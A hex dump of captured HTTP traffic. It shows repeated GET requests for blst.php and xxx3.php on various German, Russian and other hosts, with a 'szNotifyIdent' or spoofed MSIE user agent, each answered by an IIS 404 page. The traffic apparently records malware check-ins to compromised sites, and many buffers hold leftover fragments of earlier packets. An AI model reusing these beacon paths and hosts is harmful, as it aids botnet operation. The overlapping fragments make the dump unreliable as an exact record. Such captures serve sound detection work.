0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f5f7468 656d6573 2f6b6f70   GET /_themes/kop
0x00000010 (00016)   69652d76 6f6e2d66 616e7461 7369652d   ie-von-fantasie-
0x00000020 (00032)   696e2d62 6c61752f 626c7374 2e706870   in-blau/blst.php
0x00000030 (00048)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000040 (00064)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000050 (00080)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000060 (00096)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000070 (00112)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000080 (00128)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000090 (00144)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000a0 (00160)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x000000b0 (00176)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000c0 (00192)   0a486f73 743a2077 77772e31 33747732   .Host: www.13tw2
0x000000d0 (00208)   32726967 6f626572 742e6465 0d0a436f   2rigobert.de..Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f62696c 6465722f 75706c6f   GET /bilder/uplo
0x00000010 (00016)   6164732f 78787833 2e706870 3f703d32   ads/xxx3.php?p=2
0x00000020 (00032)   33343232 2669643d 34323637 32363131   3422&id=42672611
0x00000030 (00048)   3826653d 34323631 32313620 48545450   8&e=4261216 HTTP
0x00000040 (00064)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000050 (00080)   3a20737a 4e6f7469 66794964 656e740d   : szNotifyIdent.
0x00000060 (00096)   0a486f73 743a2073 63686966 66737061   .Host: schiffspa
0x00000070 (00112)   7274792e 64650d0a 0d0a612f 342e3020   rty.de....a/4.0 
0x00000080 (00128)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000090 (00144)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000a0 (00160)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x000000b0 (00176)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000c0 (00192)   0a486f73 743a2077 77772e31 33747732   .Host: www.13tw2
0x000000d0 (00208)   32726967 6f626572 742e6465 0d0a436f   2rigobert.de..Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 626c7374   GET /images/blst
0x00000010 (00016)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000030 (00048)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000040 (00064)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a2074 72656872   27)..Host: trehr
0x000000b0 (00176)   65636869 652e7275 0d0a436f 6e6e6563   echie.ru..Connec
0x000000c0 (00192)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 6f626572 742e6465 0d0a436f   ....obert.de..Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f736572 76696365 2f636f6e   GET /service/con
0x00000010 (00016)   73747275 6374696f 6e2f7878 78332e70   struction/xxx3.p
0x00000020 (00032)   68703f70 3d323334 32322669 643d3432   hp?p=23422&id=42
0x00000030 (00048)   36373236 31313826 653d3432 36313231   6726118&e=426121
0x00000040 (00064)   36204854 54502f31 2e310d0a 55736572   6 HTTP/1.1..User
0x00000050 (00080)   2d416765 6e743a20 737a4e6f 74696679   -Agent: szNotify
0x00000060 (00096)   4964656e 740d0a48 6f73743a 20737472   Ident..Host: str
0x00000070 (00112)   6f79696e 64757374 72792e72 750d0a0d   oyindustry.ru...
0x00000080 (00128)   0a540d0a 0d0a3c68 746d6c3e 0a20203c   .T....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 626c7374   GET /images/blst
0x00000010 (00016)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000030 (00048)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000040 (00064)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a2074 75726e73   27)..Host: turns
0x000000b0 (00176)   74796c65 73746963 6b657469 6e672e63   tylesticketing.c
0x000000c0 (00192)   6f6d0d0a 436f6e6e 65637469 6f6e3a20   om..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a436f   Keep-Alive....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f636f6e 74726f6c 2f73656c   GET /control/sel
0x00000010 (00016)   6c2f742f 78787833 2e706870 3f703d32   l/t/xxx3.php?p=2
0x00000020 (00032)   33343232 2669643d 34323637 32363131   3422&id=42672611
0x00000030 (00048)   3826653d 34323631 32313620 48545450   8&e=4261216 HTTP
0x00000040 (00064)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000050 (00080)   3a20737a 4e6f7469 66794964 656e740d   : szNotifyIdent.
0x00000060 (00096)   0a486f73 743a2076 6c61647a 65726e6f   .Host: vladzerno
0x00000070 (00112)   70726f64 7563742e 72750d0a 0d0a646f   product.ru....do
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a2074 75726e73   27)..Host: turns
0x000000b0 (00176)   74796c65 73746963 6b657469 6e672e63   tylesticketing.c
0x000000c0 (00192)   6f6d0d0a 436f6e6e 65637469 6f6e3a20   om..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a436f   Keep-Alive....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f646973 74726f2f 626c7374   GET /distro/blst
0x00000010 (00016)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000030 (00048)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000040 (00064)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a2074 77696c69   27)..Host: twili
0x000000b0 (00176)   6768747a 6f6e652e 637a0d0a 436f6e6e   ghtzone.cz..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a6c69 76650d0a 0d0a436f   ve....live....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f5f7468 656d6573 2f6b6f70   GET /_themes/kop
0x00000010 (00016)   69652d76 6f6e2d66 616e7461 7369652d   ie-von-fantasie-
0x00000020 (00032)   696e2d62 6c61752f 78787833 2e706870   in-blau/xxx3.php
0x00000030 (00048)   3f703d32 33343232 2669643d 34323637   ?p=23422&id=4267
0x00000040 (00064)   32363131 3826653d 34323631 32313620   26118&e=4261216 
0x00000050 (00080)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000060 (00096)   67656e74 3a20737a 4e6f7469 66794964   gent: szNotifyId
0x00000070 (00112)   656e740d 0a486f73 743a2077 77772e31   ent..Host: www.1
0x00000080 (00128)   33747732 32726967 6f626572 742e6465   3tw22rigobert.de
0x00000090 (00144)   0d0a0d0a 20434c52 20322e30 2e353037   .... CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a2074 77696c69   27)..Host: twili
0x000000b0 (00176)   6768747a 6f6e652e 637a0d0a 436f6e6e   ghtzone.cz..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a6c69 76650d0a 0d0a436f   ve....live....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 5f6e6f74   GET /images/_not
0x00000010 (00016)   65732f62 6c73742e 70687020 48545450   es/blst.php HTTP
0x00000020 (00032)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000030 (00048)   2a0d0a41 63636570 742d456e 636f6469   *..Accept-Encodi
0x00000040 (00064)   6e673a20 677a6970 2c206465 666c6174   ng: gzip, deflat
0x00000050 (00080)   650d0a55 7365722d 4167656e 743a204d   e..User-Agent: M
0x00000060 (00096)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000070 (00112)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000080 (00128)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000090 (00144)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x000000a0 (00160)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x000000b0 (00176)   3a20766e 6969706f 2e72750d 0a436f6e   : vniipo.ru..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a69 76650d0a 0d0a436f   ive....ive....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f6b6172 74656e2f 78787833   GET /karten/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2077   fyIdent..Host: w
0x00000060 (00096)   77772e65 6d696c2d 7a697474 61752e64   ww.emil-zittau.d
0x00000070 (00112)   650d0a0d 0a653b20 4d534945 20362e30   e....e; MSIE 6.0
0x00000080 (00128)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000090 (00144)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x000000a0 (00160)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x000000b0 (00176)   3a20766e 6969706f 2e72750d 0a436f6e   : vniipo.ru..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a69 76650d0a 0d0a436f   ive....ive....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 626c7374   GET /images/blst
0x00000010 (00016)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000030 (00048)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000040 (00064)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a2076 6f656c63   27)..Host: voelc
0x000000b0 (00176)   6b657267 6d62682e 64650d0a 436f6e6e   kergmbh.de..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0a69 76650d0a 0d0a436f   ve.....ive....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 626c7374   GET /images/blst
0x00000010 (00016)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000030 (00048)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000040 (00064)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a2076 7365726f   27)..Host: vsero
0x000000b0 (00176)   7a65746b 692e7275 0d0a436f 6e6e6563   zetki.ru..Connec
0x000000c0 (00192)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 0d0a0a69 76650d0a 0d0a436f   .......ive....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f68746d 6c617265 612f696d   GET /htmlarea/im
0x00000010 (00016)   61676573 2f787878 332e7068 703f703d   ages/xxx3.php?p=
0x00000020 (00032)   32333432 32266964 3d343236 37323631   23422&id=4267261
0x00000030 (00048)   31382665 3d343236 31323136 20485454   18&e=4261216 HTT
0x00000040 (00064)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000050 (00080)   743a2073 7a4e6f74 69667949 64656e74   t: szNotifyIdent
0x00000060 (00096)   0d0a486f 73743a20 7777772e 6c657661   ..Host: www.leva
0x00000070 (00112)   64612e72 750d0a0d 0a3b2057 696e646f   da.ru....; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a2076 7365726f   27)..Host: vsero
0x000000b0 (00176)   7a65746b 692e7275 0d0a436f 6e6e6563   zetki.ru..Connec
0x000000c0 (00192)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 0d0a0a69 76650d0a 0d0a436f   .......ive....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

